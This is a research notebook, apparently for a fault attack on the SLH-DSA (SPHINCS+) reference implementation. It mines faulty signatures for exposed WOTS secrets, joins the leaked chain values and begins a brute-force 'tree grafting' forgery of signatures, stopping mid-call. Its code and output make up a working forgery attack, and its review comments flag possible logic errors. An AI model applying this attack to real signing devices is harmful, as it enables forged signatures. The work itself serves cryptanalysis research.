# Config

In [1]:
base = "../"  # directory holding the input files, relative to the working directory
#base = "../victims/sphincsplus/ref/"  # alternative input location
keys_file = base + "keys.txt"  # lines of the form "name: <hex>"; must provide 'sk' and 'pk'
sigs_file = base + "sigs.txt"  # one hex-encoded signature (followed by its message) per line
sigs_simulated_file = base + "sigs_simulated.txt"  # same format; simulated faulty signatures (optional)

params = 'SLH-DSA-SHAKE-256s'  # parameter set name passed to fips205.SLH_DSA

sanity_check = False  # re-sign the first signature of sigs_file and compare it with the stored one
simulate_faults = True  # additionally load sigs_simulated_file if it exists
filter_sigs  = True  # write valid / secret-exposing signatures to ../sigs_filtered.txt

# Setup

Install dependencies and define helper functions.

In [2]:
# Install the packages listed in requirements.txt into the kernel's environment (%pip),
# then show the version of the `python` found on PATH (may differ from the kernel's interpreter).
%pip install -r requirements.txt
!python --version

Note: you may need to restart the kernel to use updated packages.
Python 3.10.12


In [3]:
import fips205

In [4]:
# Instantiate the parameter set and cache its parameters (FIPS 205 notation) as globals
slh = fips205.SLH_DSA(params)
a = slh.a    # FORS tree height
d = slh.d    # number of hypertree layers
hp = slh.hp  # height h' of each XMSS tree
n = slh.n    # hash output / security parameter length in bytes
k = slh.k    # number of FORS trees

In [5]:
def print_adrs(adrs: fips205.ADRS, end='\n', verbose=False):
    """Print the bytes of `adrs` as space-separated groups of 8 hex digits.

    Args:
        adrs: address whose ``adrs()`` bytes are printed.
        end: string printed after the address line (default newline).
        verbose: if True, first print a header line naming the address fields.
    """
    adrs_hex = adrs.adrs().hex()
    if verbose:
        header_fields = (('LAYER', 4), ('TREE ADDR', 18), ('TYP', 6), ('KADR', 5))
        print(''.join(label + ' ' * pad for label, pad in header_fields) + 'PADD = 0')
    words = [adrs_hex[pos:pos + 8] for pos in range(0, len(adrs_hex), 8)]
    print(' '.join(words), end=' ')
    print(end=end)

In [6]:
from os import cpu_count


def extract_wots_keys(pk: bytes, sigs: list[bytes]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    """Extract the WOTS keys contained in every signature, grouped by address.

    Each signature is handed to ``cryptanalysis_lib.process_sig`` in a worker process
    together with its index in `sigs`. The per-signature results are merged with
    ``merge_groups``.

    Args:
        pk: the SLH-DSA public key.
        sigs: raw signature lines; bytes beyond the computed signature length are
            presumably the signed message (the sanity-check cell treats them that way).

    Returns:
        A dict mapping each address to the set of WOTS keys observed there
        (empty if `sigs` is empty).
    """
    import multiprocessing
    from cryptanalysis_lib import process_sig

    # Signature layout (FIPS 205): randomizer R (n bytes), FORS signature
    # (k trees * (1 secret + a auth nodes) * n bytes), then d hypertree layers, each
    # holding a WOTS signature (len * n bytes) and an XMSS auth path (hp * n bytes).
    wots_bytes = slh.len * n
    xmss_bytes = hp * n
    fors_bytes = k * (n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    if not sigs:
        return {}

    # Leave two cores free, but always use at least one worker: cpu_count() may
    # return None, and a non-positive process count makes Pool() raise ValueError.
    num_procs = max(1, (cpu_count() or 1) - 2)
    args = [(params, pk, sig_idx, sig, sig_len) for sig_idx, sig in enumerate(sigs)]
    with multiprocessing.Pool(processes=num_procs) as pool:
        results = pool.map(process_sig, args)

    # Merge the per-signature results into one address -> keys mapping
    merged = {}
    for item in results:
        merged = merge_groups(merged, item)
    return merged

def merge_groups(left: dict[fips205.ADRS, set], right: dict[fips205.ADRS, set]) -> dict[fips205.ADRS, set]:
    """Union the key sets of `right` into `left`, address by address.

    `left` is modified in place and also returned. Each merged entry is a new set
    (the union), so the set objects of `right` are never stored in `left`.
    """
    for adrs, right_keys in right.items():
        left[adrs] = left.setdefault(adrs, set()) | right_keys
    return left


In [7]:
from typing import Generator


def shared_intermediates(v1: fips205.WOTSKeyData, valid: fips205.WOTSKeyData) -> Generator[tuple[int, int], None, bool]:
    """Yield (chain_idx, hash_iter) for each intermediate of `v1` equal to the valid key's chain value.

    For every chain `chain_idx`, the entries ``v1.intermediates[chain_idx][1:]`` are compared
    with the n-byte value ``valid.sig[chain_idx*n:(chain_idx+1)*n]``. `hash_iter` is the
    position of the matching entry within ``v1.intermediates[chain_idx]``.

    This is a generator function: calling it returns a generator object, which is ALWAYS
    truthy. Use ``any(shared_intermediates(v1, valid))`` to test whether anything is shared.
    The generator's return value (``StopIteration.value``) is True iff at least one pair
    was yielded.

    Nothing is yielded if `valid` is None, if `v1 == valid`, or if either key has no
    intermediates.
    """
    if valid is None or v1 == valid:
        return False
    if not v1.intermediates or not valid.intermediates:
        return False
    retval = False
    for chain_idx, chain in enumerate(v1.intermediates):
        if not chain:
            continue
        valid_value = valid.sig[chain_idx * n:(chain_idx + 1) * n]
        for hash_iter, step in enumerate(chain[1:], start=1):
            if step == valid_value:
                retval = True
                yield (chain_idx, hash_iter)
    return retval
    

def find_collisions(wots_sigs: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    """Return only the addresses at which at least two distinct WOTS keys were observed."""
    collisions = {}
    for adrs, keys in wots_sigs.items():
        if len(keys) >= 2:
            collisions[adrs] = keys
    return collisions

def print_arr_w(arr: list[int], width: int = 2):
    """Print integers as ``[ 01 02 ... ]`` with each value zero-padded to `width` digits.

    Args:
        arr: integers to print.
        width: minimum number of digits per value. The default is 2; the previous default
            was the type object ``int``, which broke formatting whenever width was omitted.
    """
    print('[ ' + ''.join(f"{x:0{width}d} " for x in arr) + ']')
    
def valid_sigs_d(groups):
    """Map each address to a key at that address whose ``valid`` attribute is truthy.

    Addresses without such a key are omitted. If several keys at one address are valid,
    the last one iterated wins.
    """
    valid_by_adrs = {}
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                valid_by_adrs[adrs] = key
    return valid_by_adrs

def hex(s: bytes | None) -> str:
    return s.hex() if s else "None"

def print_key_data(v: fips205.WOTSKeyData, adrs: fips205.ADRS, pk_seed: bytes, valid_key: fips205.WOTSKeyData = None, indent=''):
    """Pretty-print one WOTS key observed at address `adrs`.

    Prints the validity flag ("Valid", "Invalid" or "--"), a 128-hex-digit prefix of
    ``v.sig``, the public key stored in ``v.pk`` next to the one recomputed by
    ``v.calculate_pk``, the index of the originating signature, and the `chains` /
    `chains_calculated` step vectors. If `valid_key` is given and `v` is not valid, every
    pair yielded by ``shared_intermediates(v, valid_key)`` is listed as well.
    Every line is prefixed with `indent`.
    """
    if v.valid:
        status = "Valid"
    elif v.valid == False:  # v.valid may also be None (unknown); that case prints "--"
        status = "Invalid"
    else:
        status = "--"
    print(indent + status, end='\t')
    print(indent + v.sig.hex()[:128] + '...')
    print(indent + '\tPK (from tree)\t' + hex(v.pk))
    recomputed_pk = v.calculate_pk(params, adrs, pk_seed)
    print(indent + '\tPK (calculated)\t' + hex(recomputed_pk))
    print(indent + f"\tWOTS key is part of signature {v.sig_idx}")

    # header row of chain indices, followed by the two step vectors
    print(indent + '\t\t\t', end='')
    print_arr_w(list(range(len(v.chains))), 2)
    print(indent + "\tchains\t\t", end='')
    print_arr_w(v.chains, 2)
    print(indent + "\tchains (calc)\t", end='')
    print_arr_w(v.chains_calculated, 2)

    if not valid_key or v.valid:
        return
    for chain_idx, exposed in shared_intermediates(v, valid_key):
        print(indent + f"\t\tExposed {exposed} secret values at chain_idx {chain_idx}")
    

def print_groups(pk_seed: bytes, groups: dict[fips205.ADRS, list[fips205.WOTSKeyData]], skip_no_exposed=True):
    """Print every address group, sorted by layer address, showing the valid key first.

    For each address the verbose address header and the number of keys are printed,
    followed by the valid key (if one was observed) and each invalid key.

    Args:
        pk_seed: public seed, used to recompute the WOTS public keys.
        groups: WOTS keys per address.
        skip_no_exposed: if True, invalid keys that share no intermediate chain value
            with the valid key at the same address (or have no valid key to compare
            against) are not printed.
    """
    valid_sigs = valid_sigs_d(groups)

    for adrs, value in sorted(groups.items(), key=lambda item: item[0].get_layer_address()):
        valid_sig = valid_sigs.get(adrs)
        invalid_sigs = [v for v in value if not v.valid]
        print_adrs(adrs, end='', verbose=True)
        print(len(value))

        for v in [valid_sig] + invalid_sigs:
            if not v:
                continue
            if skip_no_exposed and not v.valid:
                # shared_intermediates() is a generator, so the bare call is always truthy;
                # any() is required to actually check for a shared chain value.
                exposed = valid_sig is not None and any(shared_intermediates(v, valid_sig))
                if not exposed:
                    continue
            print_key_data(v, adrs, pk_seed, valid_sig, indent='\t')

# Clean Start

Run this cell and all cells below it to start a clean analysis.

In [8]:
# Reset the analysis state: number of signatures already processed, and the WOTS keys collected per address
processed_sigs = 0
groups: dict[fips205.ADRS, set[fips205.WOTSKeyData]] = {}

In [9]:
# Load keys
# Load keys: every non-blank line of keys_file has the form "<name>: <hex>"
with open(keys_file, "r") as f:
    # split only on the first ': ' and skip blank lines (otherwise a blank line raises IndexError)
    lines = [line.split(': ', 1) for line in f if line.strip()]
    keys = {name: bytes.fromhex(value.strip()) for name, value in lines}
sk = keys['sk']
pk = keys['pk']
pk_seed = pk[:n]  # PK.seed is the first n bytes of the public key
pk.hex()

'0bc005bdb4dfb431bb250e109ca4430d42f4fd7e9270f515640701df308413952d854a500f3e893a8804ad88a600ee6812c3317e422848c5854c2b18588c1b9a'

# Update Experiment
Run this cell and all cells below it to process new signatures.

# Load real signatures

This loads the real signatures from `sigs_file` (see config)

In [10]:
with open(sigs_file, "r") as f:
    # One hex-encoded signature (followed by its message) per line. Blank lines are skipped;
    # they would otherwise become empty b'' "signatures".
    sigs = [bytes.fromhex(line.strip()) for line in f if line.strip()]
    # sigs = sigs[:1000]  # uncomment to limit the number of signatures for quick runs
print(f"Loaded {len(sigs)} signatures")

Loaded 29065 signatures


# Load simulated faulty signatures
This section loads simulated faults from `sigs_simulated_file`

In [11]:
import os
if simulate_faults and os.path.exists(sigs_simulated_file):
    with open(sigs_simulated_file, "r") as f:
        # same format as sigs_file; blank lines are skipped
        faulty_sigs = [bytes.fromhex(line.strip()) for line in f if line.strip()]
    print(f"Loaded {len(faulty_sigs)} faulty (simulated) signatures")
    simulated_groups = extract_wots_keys(pk, faulty_sigs)
    # Tag simulated keys: their sig_idx indexes faulty_sigs, not sigs.
    # (A distinct loop name avoids clobbering the global `keys` dict loaded above.)
    for simulated_keys in simulated_groups.values():
        for key in simulated_keys:
            key.simulated = True
    print_groups(pk_seed, simulated_groups)
    groups = merge_groups(groups, simulated_groups)
else:
    print("Fault simulation disabled or no simulated faulty signatures found")

Fault simulation disabled or no simulated faulty signatures found


# Tooling sanity check

This section tries to generate a signature using the same key and randomization values as the first signature in `sigs_file`.
We expect them to match. This assumes that the first signature in `sigs_file` is a valid signature.

In [12]:
if sanity_check:
    # Signature layout: R (n bytes) || FORS (k * (a + 1) * n bytes) || d * (WOTS sig || auth path)
    wots_len = slh.len
    wots_bytes = wots_len * n
    xmss_bytes = hp * n
    fors_bytes = k*(n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    sig = sigs[0]

    # Each stored line is the signature followed by the message; R is the first n bytes
    m = sig[sig_len:]
    r = sig[:n]
    pysig = slh.slh_sign_internal(m, sk, None, r=r)
    pysig += m

    if pysig != sig:
        print("Signature mismatch")
        print(pysig.hex())
        print(sig.hex())
    else:
        # only report success when the re-generated signature actually matches
        print("Passed sanity check")
else:
    print("Skipping sanity check")

Skipping sanity check


# Extract WOTS keys

Extract all WOTS keys from all signatures.

In [13]:
# Skip signatures already processed by an earlier run of this section
if processed_sigs > 0:
    print(f"Skipping {processed_sigs} signatures")

# NOTE(review): `sigs` is rebound to the unprocessed tail here, and extract_wots_keys
# numbers signatures from 0 within the list it receives (presumably stored as key.sig_idx).
# After a repeated run, keys from earlier runs and keys from this run index different
# lists, so later lookups of the form sigs[key.sig_idx] are only reliable for keys
# extracted in the most recent run.
sigs = sigs[processed_sigs:]
print(f"Processing {len(sigs)} signatures...", end=' ')

groups = merge_groups(groups, extract_wots_keys(pk, sigs))
print(f"Found {len(groups)} unique addresses")

# update processed_sigs for consecutive runs
processed_sigs += len(sigs)

Processing 29065 signatures... Found 198057 unique addresses


In [14]:
if False:
    # get distribution of steps in (valid) signatures
    distr = [[0 for _ in range(16)] for _ in range(67)]
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                for chain_idx, chain in enumerate(key.chains):
                        distr[chain_idx][chain] += 1           
    distr

    %pip install matplotlib
    import matplotlib.pyplot as plt

    # distr is your 67×16 list of counts
    # e.g. distr = [[…], …, […]]

    plt.figure(figsize=(8, 10))
    plt.imshow(distr, aspect='auto')        # default colormap
    plt.colorbar(label='Count')              # show scale
    plt.xlabel('Step value (0–15)')
    plt.ylabel('Chain index (0–66)')
    plt.title('Distribution of steps in valid signatures')
    plt.tight_layout()
    plt.show()

# Group Collisions

Addresses at which more than one distinct WOTS key was observed (collisions) are analysed below.

In [15]:
# sanity check for multiple valid keys
# sanity check: each address may have at most one valid WOTS key
for adrs, keys in groups.items():
    num_valid = sum(1 for v in keys if v.valid)
    if num_valid <= 1:
        continue
    print("ERROR: found multiple valid keys for the same address", adrs, keys)
    raise ValueError("Multiple valid keys for the same address")

In [16]:
# maintain a dictionary of valid signatures per adrs
# address -> the valid WOTS key observed at that address (computed before any filtering below)
valid_sigs = valid_sigs_d(groups)

In [17]:
# only keep keys at layer 7
# Only keep keys on the top hypertree layer, d - 1 (layer 7 for SLH-DSA-SHAKE-256s).
# Deriving it from d keeps this cell correct for other parameter sets.
target_layer = d - 1
groups = {
    adrs: wots_keys
    for adrs, wots_keys in groups.items()
    if adrs.get_layer_address() == target_layer and len(wots_keys) > 0
}
print(f"Found {len(groups)} groups at layer {target_layer}")

# only keep keys where we also observed valid signatures
groups = {adrs: wots_keys for adrs, wots_keys in groups.items() if adrs in valid_sigs}
print(f"Found {len(groups)} groups with valid signatures")

# only keep collisions (more than one distinct key at the same address)
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with collisions")



Found 256 groups at layer 7
Found 217 groups with valid signatures
Found 217 groups with collisions


In [18]:
# post-process collided WOTS keys
# Post-process colliding WOTS keys: compute each key's intermediates relative to the valid key at its address
for adrs, keys in groups.items():
    if adrs in valid_sigs:
        valid_sig = valid_sigs[adrs]
        for key in keys:
            key.calculate_intermediates(params, adrs, pk_seed, valid_sig)

In [19]:
# filter out all-7 sigs
# Collect the indices of signatures whose WOTS key has every calculated chain step equal to 7,
# and write those signatures to sigs_wots7.txt for separate inspection.
# Simulated keys are skipped: their sig_idx indexes the simulated-signature file, not `sigs`.
all_7_indices = {
    key.sig_idx
    for wots_keys in groups.values()
    for key in wots_keys
    if not getattr(key, 'simulated', False)
    and all(c == 7 for c in key.chains_calculated)
}

with open("sigs_wots7.txt", "w") as f:
    for idx in sorted(all_7_indices):
        f.write(f"{sigs[idx].hex()}\n")

# Filter out keys containing no WOTS secrets.
# NOTE(review): the bound 17 also admits the value w = 16; if unresolved chains are marked
# with w, this filter keeps every key. Confirm whether slh.w is the intended bound.
groups = {
    adrs: [key for key in wots_keys if any(c < 17 for c in key.chains_calculated)]
    for adrs, wots_keys in groups.items()
}
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with at least one WOTS secret")

Found 217 groups with at least one WOTS secret


In [20]:
# Print every remaining group, including invalid keys that expose no chain values
print_groups(pk_seed, groups, skip_no_exposed=False)

LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 0000002b 00000000 00000000 2
	Valid		8797b34b522d6e3841fc234a812f0dd028f525e1592594a4f69213357783a549c6364740b2d78c38e2ba8c1562a1c67854a1d01233c07d6b921df2249e88ffcb...
		PK (from tree)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		PK (calculated)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		WOTS key is part of signature 0
				[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
		chains		[ 00 11 05 09 09 10 01 14 15 03 01 00 05 12 09 06 08 12 10 14 09 02 15 00 08 15 06 14 07 10 02 04 09 11 06 06 05 09 02 05 14 08 13 09 03 07 11 00 12 05 00 04 14 14 07 05 09 15 10 10 06 05 02 06 01 13 08 ]
		chains (calc)	[ 00 11 05 09 09 10 01 14 15 03 01 00 05 12 09 06 08 12 10 14 09 02 15 00 08 15 06 1

In [21]:
def filter_signatures(sigs: list[bytes], wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> set[bytes]:
    """Select the signatures worth keeping for further analysis.

    Only addresses with at least one valid AND at least one invalid key are considered.
    There, the signature of the valid key is kept, as is the signature of every invalid key
    that shares an intermediate chain value with the valid key (an exposed WOTS secret).

    Args:
        sigs: the real signatures; ``key.sig_idx`` indexes into this list.
        wots_keys: WOTS keys per address.

    Returns:
        The set of selected signatures.
    """
    filtered_sigs = set()
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in find_collisions(wots_keys).items():
        if not any(key.valid for key in keys) or all(key.valid for key in keys):
            continue
        valid_key = valid_sigs.get(adrs)
        for key in keys:
            if getattr(key, 'simulated', False):
                # sig_idx of simulated keys indexes the simulated-signature file, not `sigs`
                continue
            if key.valid:
                # keep valid keys
                filtered_sigs.add(sigs[key.sig_idx])
            elif valid_key is not None and any(shared_intermediates(key, valid_key)):
                # any() is required: the generator object returned by shared_intermediates is always truthy
                filtered_sigs.add(sigs[key.sig_idx])
    return filtered_sigs

if filter_sigs:
    # only keep signatures that are valid or have exposed WOTS keys
    filtered_sigs = filter_signatures(sigs, groups)
    print(f"Kept {len(filtered_sigs)} of {len(sigs)} signatures")
    with open("../sigs_filtered.txt", "w") as f:
        for sig in filtered_sigs:
            f.write(sig.hex() + "\n")

Kept 446 of 29065 signatures


In [22]:
# filter groups with exposed WOTS secrets
# Keep only groups in which at least one invalid key shares an intermediate chain value with
# the valid key. shared_intermediates() returns a generator (always truthy), so it must be
# evaluated with any(); the bare call kept every group that had any invalid key.
groups = {
    adrs: wots_keys
    for adrs, wots_keys in groups.items()
    if any(not key.valid and any(shared_intermediates(key, valid_sigs[adrs])) for key in wots_keys)
}
print(f"Found {len(groups)} groups with exposed WOTS secrets")
print_groups(pk_seed, groups)

Found 217 groups with exposed WOTS secrets
LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 0000002b 00000000 00000000 2
	Valid		8797b34b522d6e3841fc234a812f0dd028f525e1592594a4f69213357783a549c6364740b2d78c38e2ba8c1562a1c67854a1d01233c07d6b921df2249e88ffcb...
		PK (from tree)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		PK (calculated)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		WOTS key is part of signature 0
				[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
		chains		[ 00 11 05 09 09 10 01 14 15 03 01 00 05 12 09 06 08 12 10 14 09 02 15 00 08 15 06 14 07 10 02 04 09 11 06 06 05 09 02 05 14 08 13 09 03 07 11 00 12 05 00 04 14 14 07 05 09 15 10 10 06 05 02 06 01 13 08 ]
		chains (calc)	[ 00 11 05 09 09 10 01 14 15 03 01 00 05 

In [23]:
# Join WOTS keys to get a WOTS key usable for signing as many messages as possible
from copy import deepcopy

def join_sigs(wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]], params, pk_seed) -> dict[fips205.ADRS, fips205.WOTSKeyData]:
    """Fold all WOTS keys observed at each address into a single joined key.

    For every address with at least two keys and a valid key, a deep copy of the valid key
    is combined with every key at that address via ``WOTSKeyData.join``. Presumably the join
    keeps the most exposed chain values so the result can sign as many messages as
    possible. TODO: confirm against ``join``.

    Addresses without a valid key are skipped, since there is no starting point for the join.

    Returns:
        dict mapping address -> joined key.
    """
    joined_sigs = {}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in wots_keys.items():
        if len(keys) < 2 or adrs not in valid_sigs:
            continue
        valid_key = valid_sigs[adrs]
        retval = deepcopy(valid_key)
        if not retval.chains_calculated:
            # intermediates were not computed yet for this valid key: log the address and compute them
            print_adrs(adrs)
            retval.calculate_intermediates(params, adrs, pk_seed, valid_key)
        for key in keys:
            retval = retval.join(key, params)
        joined_sigs[adrs] = retval
    return joined_sigs

joined_sigs = join_sigs(groups, params, pk_seed)
print(f"Joined {len(joined_sigs)} signatures")

# Filter out joined keys with unresolved chains (any calculated step >= w)
joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if all(c < slh.w for c in key.chains_calculated)}
print(f"Filtered {len(joined_sigs)} (unresolved chains)")

# Filter out joined keys whose calculated chains are all 0
joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if any(c > 0 for c in key.chains_calculated)}
print(f"Filtered {len(joined_sigs)} (wildcard chains)")

Joined 217 signatures
Filtered 217 (unresolved chains)
Filtered 216 (wildcard chains)


In [24]:
# Find the joined key with the highest exposure score, i.e. the smallest calculated chain steps
# (score = sum over all chains of w - chains_calculated[i]).
def score(key: fips205.WOTSKeyData) -> int:
    """Exposure score of `key`: sum of (w - chains_calculated[i]) over all chains."""
    return sum(slh.w - c for c in key.chains_calculated)


if not joined_sigs:
    raise ValueError("No joined WOTS keys left to analyse")
most_exposed_adrs, most_exposed_key = max(
    joined_sigs.items(),
    key=lambda item: score(item[1]))
print("Key with most exposed chains (score: {}):".format(
    score(most_exposed_key)
))
print_adrs(most_exposed_adrs, verbose=True)
print_key_data(most_exposed_key, most_exposed_adrs, pk_seed, None)

# try to sign the original message with the exposed key
print("Signing original (valid) msg with exposed key...")
assert most_exposed_key.try_sign(most_exposed_key.chains, most_exposed_adrs, pk_seed, params)

# Sign a modified digit vector: among the first len1 (message) chains, find those whose
# calculated step differs from the key's own chain step, and increment the first of them.
exposed_offsets = [
    (idx, c - cc)
    for idx, (c, cc) in enumerate(zip(most_exposed_key.chains[:slh.len1],
                                      most_exposed_key.chains_calculated[:slh.len1]))
    if c != cc
]
if len(exposed_offsets) >= 2:
    i, j = exposed_offsets[:2]
    print(f"Found exposed offsets: i={i}, j={j}")
    chains = most_exposed_key.chains_calculated.copy()[:slh.len1]
    chains[i[0]] += 1
    print("Signing modified message with exposed key...")
    assert most_exposed_key.try_sign(chains, most_exposed_adrs, pk_seed, params)
else:
    print("Not enough exposed offsets found")

print("="*64)
print("All keys for exposed address:")
print_adrs(most_exposed_adrs, verbose=True)
for key in groups[most_exposed_adrs]:
    print_key_data(key, most_exposed_adrs, pk_seed, valid_sigs[most_exposed_adrs])


Key with most exposed chains (score: 829):
LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 0000005b 00000000 00000000 
--	cb9a72b7e655acde6a0fa8545cfabbabffbef2f34908952d4b320ce2e8cde04013213d4e537e21572438143435634d8ae5040c1ec592bd8b712aef7f0772ad6b...
	PK (from tree)	None
	PK (calculated)	bb9b9cbe05bdbf04d45c5787f71c96d2d143a26aae565ecb4aed828345fc04d2
	WOTS key is part of signature None
			[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
	chains		[ 07 02 08 06 04 03 11 03 09 02 07 09 09 12 10 04 05 02 08 07 05 04 04 02 00 06 15 00 15 07 06 13 05 10 14 00 13 02 00 12 10 11 01 15 05 13 15 03 12 00 05 15 08 08 04 07 10 03 14 14 02 14 11 15 01 14 04 ]
	chains (calc)	[ 07 02 07 06 04 03 06 03 07 02 04 07 07 07 07 04 05 02 07 07 05 04 01 01 00 00 00 00 05 00 06 07 05 01 07 00 

In [25]:
# Calculate the fraction of signable messages (ignoring the checksum chains)
import math


def num_signable_messages(key: fips205.WOTSKeyData) -> float:
    """Estimate the fraction of message digit vectors `key` can sign, ignoring the checksum.

    Only the first ``slh.len1`` (message) chains are considered. Each chain whose calculated
    step c satisfies c < w - 1 contributes a factor (w - 1 - c); every other chain contributes
    1. The product is divided by (w - 1) ** len1. Despite the function name, the result is a
    float fraction, not a count; it lies in (0, 1] for non-negative steps.

    NOTE(review): if knowing the chain value at step c allows signing every digit d >= c
    (with d in 0..w-1), the per-chain fraction would be (w - c) / w instead. Confirm the formula.
    """
    w = slh.w
    numerator = math.prod(
        w - 1 - key.chains_calculated[i]
        for i in range(slh.len1)
        if key.chains_calculated[i] < w - 1
    )
    return numerator / (w - 1) ** slh.len1


max_expected_reps = 2**30  # abort if the brute-force search would need more attempts than this

num_signable = num_signable_messages(most_exposed_key)
expected_reps = 1/num_signable
print(f"Fraction of signable messages: {num_signable}")
print(f"Expected number of repetitions until a valid signature is found: 2**{math.log2(expected_reps)}")
if expected_reps > max_expected_reps:
    raise ValueError("Expected repetitions are too high, aborting")

Fraction of signable messages: 1.7278451120710122e-09
Expected number of repetitions until a valid signature is found: 2**29.10837895712278


In [26]:
# sign a random message with the exposed key
# NOTE(review): the 32-byte message is hard-coded, and try_sign's result is only displayed, not checked
msg = bytes.fromhex('bc9c6c7892ac9aa558a7ee5ef40a50bed3796a3cc657e88c6cedec7ddffbdad2')
most_exposed_key.try_sign(msg, most_exposed_adrs, pk_seed, params)

b'\xf0\xb1\x12\x05\xac\xdf\x98\xb2\xcb3\xec\x1d\x93x\x80\xa2\x86\x07\xf6\x82\xdeA\x8c%\x1fE\x8ce\xad\xe6\xc0\x17\x1c\xc49[@\xde\xe5\xcd\xe0M\xbf\xe3\xda\xbc\xcd\xa4E\x878\xf0w\xffI\x98L\xb8=\x90\xe4\xa8\xdd1\x8a\xdd\xfc\x12\x08I\x02\x92\xd0\x03&gO\xe0j\x1a\x86\x94\x8e)-j4\x1c\xda\xaap\xd6\x8a\xa3c\xff\xc0\x97E\x8a\xbf&_\x14|~\x0f1\xc1\xce\x047\xd7\xf7?~J\x9a\xb4\x90\xe1\x7fv\xa6\x8f\x16\x92\xdf\xbd\xaa\xec\xea-*\xec\x8b0f\xc6\x16,\xed\xfb\xb9\xf6\x87\xbc\xee\x9e\xa6W\xf3\x99#\x07\xd0\x12\x18\x9d\xa6\x9a\xe2t\x15\xd8\x89V\xf1m{\t\xff\xea\x07=X\xe6C\x1b\x97\xb6E0\x88sB\x11Eq\xfb`\x97wV\xb8\xed\xbd\x8a&\xacG\xdb\xccF\xee#\xce\xba(\xdc\x8a\x1b_\x92\xcc5\x81\x98\xd9\xff1\xda\xe8)\x13\x82\x7f\x10\x83\xa1K\xdd\xc1\\\xc2\xaa\xcb\x03\xe2\x18\x0b\x98p\xad\xfe\xf8\x0b\xb0m\x8e\xc4\x8cJ\xce\x1a`\x94\x99\xbfI\x13\xde\xc4|A\xf6b\xac\xd6Hy\x92qj\xbcQ\xadO\x81\xf5\x82\xea\xe3o\x10\xb6\xc4\x17r\x18Qsr\xa8|o\xab*\x19L\xf5\x00,$\x86\x96\x00OW\xc6\x1c\xf2&\x165\xd4\x18\xfe\xb6\xe2D\xf3X\xa5\'[E\xfc2\xac+p

# Tree Grafting

In [27]:
from cryptanalysis_lib import sign_worker, sign_worker_xmss, sign_worker_xmss_c

In [32]:
# Benchmark sign_worker on one work item (first tuple element presumably the number of attempts)
%timeit sign_worker((100, most_exposed_adrs, most_exposed_key, pk_seed, params))

3.06 ms ± 12.1 μs per loop (mean ± std. dev. of 7 runs, 100 loops each)


In [29]:
# Benchmark sign_worker_xmss; note the work size here is 1, unlike the 100 used for the other workers
%timeit sign_worker_xmss((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

573 ms ± 1.36 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)


In [None]:
# Benchmark sign_worker_xmss_c (the worker used by sign_message_batch_mp) with a work size of 100
%timeit sign_worker_xmss_c((100, most_exposed_adrs, most_exposed_key, pk_seed, params))

6.31 s ± 613 μs per loop (mean ± std. dev. of 7 runs, 1 loop each)


In [None]:
import math
from multiprocessing import Pool
from os import cpu_count
from cryptanalysis_lib import sign_worker_xmss, sign_worker_xmss_c

def sign_message_batch_mp(total_msgs, joined_sigs_items, pk_seed, params, num_procs=None):
    """
    Use a process pool to try signing `total_msgs` messages *per* (adrs, key) with `sign_worker_xmss_c`.

    For each key the work is split into `num_procs` chunks of ceil(total_msgs / num_procs)
    attempts. As soon as any chunk returns a truthy result, that result is returned and the
    remaining workers are terminated (leaving the `with Pool(...)` block calls terminate()).

    Returns:
        The first truthy worker result (presumably the number of successful signatures in
        that chunk), or 0 if no chunk succeeded or there was no work.
    """
    if num_procs is None:
        num_procs = cpu_count() or 1
    num_procs = max(1, num_procs)  # Pool() rejects a non-positive process count

    # Split total_msgs into roughly equal chunks per process
    per_proc = math.ceil(total_msgs / num_procs)
    print("Total messages per process:", per_proc)

    # Build one work item per (process x key)
    work = [
        (per_proc, adrs, key, pk_seed, params)
        for adrs, key in joined_sigs_items.items()
        for _ in range(num_procs)
    ]

    with Pool(processes=num_procs) as pool:
        # imap_unordered yields results as chunks finish; map_async returns a
        # non-iterable AsyncResult, so iterating over it raised TypeError.
        for done, res in enumerate(pool.imap_unordered(sign_worker_xmss_c, work), start=1):
            if res:
                print(f"Success after {done} of {len(work)} work items with {res} signatures.")
                return res
    return 0

num_sigs = 2**29  # should be on the order of `expected_reps` estimated above

total_success = sign_message_batch_mp(num_sigs, {most_exposed_adrs: most_exposed_key}, pk_seed, params,
